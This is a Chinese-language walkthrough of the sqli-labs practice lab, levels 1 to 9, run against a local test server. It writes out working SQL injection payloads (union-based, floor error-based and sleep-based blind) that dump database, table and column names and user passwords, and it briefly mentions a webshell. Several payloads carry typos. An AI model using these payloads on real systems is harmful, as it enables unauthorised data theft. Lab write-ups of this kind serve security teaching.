sql-labs详细解题过程

前言
less1~less4
- 预备知识
- less1
- less2
- less3
- less4
less5-less8
- 预备知识
- less5
- less6
less7~less8
less9~less10
less11~less
- 预备知识
- less11

前言

学习SQL注入之前必须要有扎实的SQL语言基础，详细可见博客SQL学习，这里我会介绍在sql-labs中使用到的sql语句。

1.查询数据库的信息：select schema_name from information_schema.schemata

2.查询表的信息：select table_name from information_schema.tables where table_schema='securty（表名）'

3.查询列的信息：select column_name from informaion_schema.columns where table_name='表名'

4.查询字段：select username,password from security.users

字符串连接函数：

1.concat(字符串1，字符串2)   --没有分隔符的连接字符串

2.concat（-/~，字符串1，字符串2）  --含有分隔符的连接字符串

3.group_concat(字符串1，字符串2)    --连接一个组的所有字符串，并用，分隔每一个字

less1~less4

预备知识

这四关均为SQL注入中的联合注入，联合注入的核心是利用union的特性。
1、UNION 操作符用于合并两个或多个 SELECT 语句的结果集。
2、UNION 内部的每个 SELECT 语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时，每个 SELECT 语句中的列的顺序必须相同。
3、只有在前一条查询语句为假时，它才会去执行后一句SQL查询语句

less1

在url输入http://127.0.0.1/sqli/Less-1/?id=1
在这里插入图片描述
回显正常
http://127.0.0.1/sqli/Less-1/?id=1’
回显出错
http://127.0.0.1/sqli/Less-1/?id=1"
单引号出错，双引号正常，字符型注入，查看源码
可见本关通过’$id’的方式包裹

通过order by猜测列数
http://127.0.0.1/sqli/Less-1/?id=1’ order by 4–+
没有第四列
在这里插入图片描述有第三列

http://127.0.0.1/sqli/Less-1/?id=1’ order by 3–+ 在这里插入图片描述由此可见，列数为三，下面查看显示位
http://127.0.0.1/sqli/Less-1/?id=-1 union select 1,2,3 --+
为什么这里是?id=-1？因为union只有在前一条语句为假时才会执行后一条
由此可见2、3为显示位
爆破当前数据库
http://127.0.0.1/sqli/Less-1/?id=-1 union select 1,database(),3 --+
在这里插入图片描述爆破表
http://127.0.0.1/sqli/Less-1/?id=-1_ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=“security” --+
下一步爆破列
http://127.0.0.1/sqli/Less-1/?id=-1_ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=“users”–+
在这里插入图片描述最后爆破字段
http://127.0.0.1/sqli/Less-1/?id=-1_ union select 1,group_concat(username),group_concat(password) from users --+

less2

首先判断它是什么类型的注入
http://127.0.0.1/sqli/Less-2/?id=1%27
在这里插入图片描述报错
http://127.0.0.1/sqli/Less-2/?id=1 and 1=1
http://127.0.0.1/sqli/Less-2/?id=1 and 1=2
没有回显，确认是数字型注入
查看源码
其包裹类型为$id，其余步骤与第一题相同

less3

在这里插入图片描述不是单引号闭合
http://127.0.0.1/sqli/Less-3/?id=1 and 1=1 --+

http://127.0.0.1/sqli/Less-3/?id=1 and 1=2 --+1=1 以及 1=2 无变化，说明不是数字型注入

在这里插入图片描述由报错信息可得是括号的问题

审源码

在这里插入图片描述包裹类型(‘id’)，其余步骤与less1相同

less4

http://127.0.0.1/sqli/Less-4/?id=1"
在这里插入图片描述报错发现是括号，利用闭合
127.0.0.1/sqli/Less-4/?id=1") --+
审查源码

包裹类型为("$id")，其余步骤与上面一致

less5-less8

预备知识

一、 burp suite的使用
二、报错注入–floor推荐博客mysql报错注入

less5

本关与之前几关大不相同，这里是报错注入，利用回显的报错信息进行注入。
打开题目，利用之前的方法可判断这里是字符型单引号
在这里插入图片描述
不同的是没有回显

第一步，爆数据库名：?id=-1’ union select 1,count(*),concat(database(),’;'floor(rand(0)*2))x from information_schema.tables group by x; --+
在这里插入图片描述

第二步，爆注册表：?id=-1’ union select 1,count(*),concat((select concat(table_name,’;’) from information_schema.tables where table_schema=“security” limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x; --+
在这里插入图片描述

第三步，注某张表的字段，这里以users为例：?id=-1’ union select 1,count(*),concat((select concat(column_name,’;’) from information_schema.columns where table_name=‘users’ limit 1,1),floor(rand(0)2))x from information_schema.tables group by x; --+
第四步，注字段的username值，这里以users为例：?id=-1’ union select 1,count(),concat((select concat (username,’;’) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x; --+
在这里插入图片描述

第五步、注字段的password，这里以users表为例：?id=-1’ union select 1,count(*),concat((select concat(password,’;’) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x; --+
在这里插入图片描述

less6

判断是不是数字型注入
http://127.0.0.1/sqli/Less-6/?id=1 and 1=1 与 http://127.0.0.1/sqli/Less-6/?id=1 and 1=2 无区别，排除数字型
在这里插入图片描述没有反应，尝试双引号，原因是闭合方式不是单引号
http://127.0.0.1/sqli/Less-6/?id=1 " --+
发现可以，说明本关是双引号包裹类型的，又因为没有回显位，所以是报错注入，其余步骤与上一题相同

less7~less8

本关是利用一句话木马，在这里不多做赘述，详细可见一句话木马，这里存在一个问题就是最新版本的phpstudy无法实现这个漏洞。

less9~less10

预备知识

时间注入：通过返回时间的长短来判断条件的正确性进而进行获取敏感信息的SQL注入。一般有两种方式使数据库进行延时。一是直接让数据库进行时间操作，二是让数据库进行其他操作如编码，加密等间接的达到延时的目的。这种注入太依赖条件判断后的执行，所以如果if和case when语句被过滤了基本就没希望了。如果有其他类型的注入就用其他的，时间注入在别无选择时可以试一试。

less 9

无论怎么注入都没有变化，考虑时间盲注
http://127.0.0.1/sqli/less-9/?id=1andsleep(5)–+
在这里插入图片描述 http://127.0.0.1/sqli/less-9/?id=1%27%20and%20sleep(5)%20–+

在这里插入图片描述
存在明显延迟，可判定这是字符型单引号包裹
一、爆破数据库长度了，这里推荐使用burp suite
利用burp对长度进行猜测爆破
二、爆破数据库名：?id=1’ and if(left(database(),1)=‘s’ ,sleep(5),1)–+
三、爆表：?id=1’ and if(left((select table_name from information_schema.tables where table_schema=database() limit x,1),5)=‘users’ ,sleep(5),1)–+
通过limit x,1 中x的变化，我们找到了users表
在这里插入图片描述
四、定向找username和password
?id=1’ and if(left((select column_name from information_schema.columns where table_name=‘users’ limit x,1),8)=‘password’ ,sleep(5),1)–+　
五、爆值
?id=1’ and if(left((select password from users order by id limit x,1),4)=‘dumb’ , sleep(5), 1) --+
在这里插入图片描述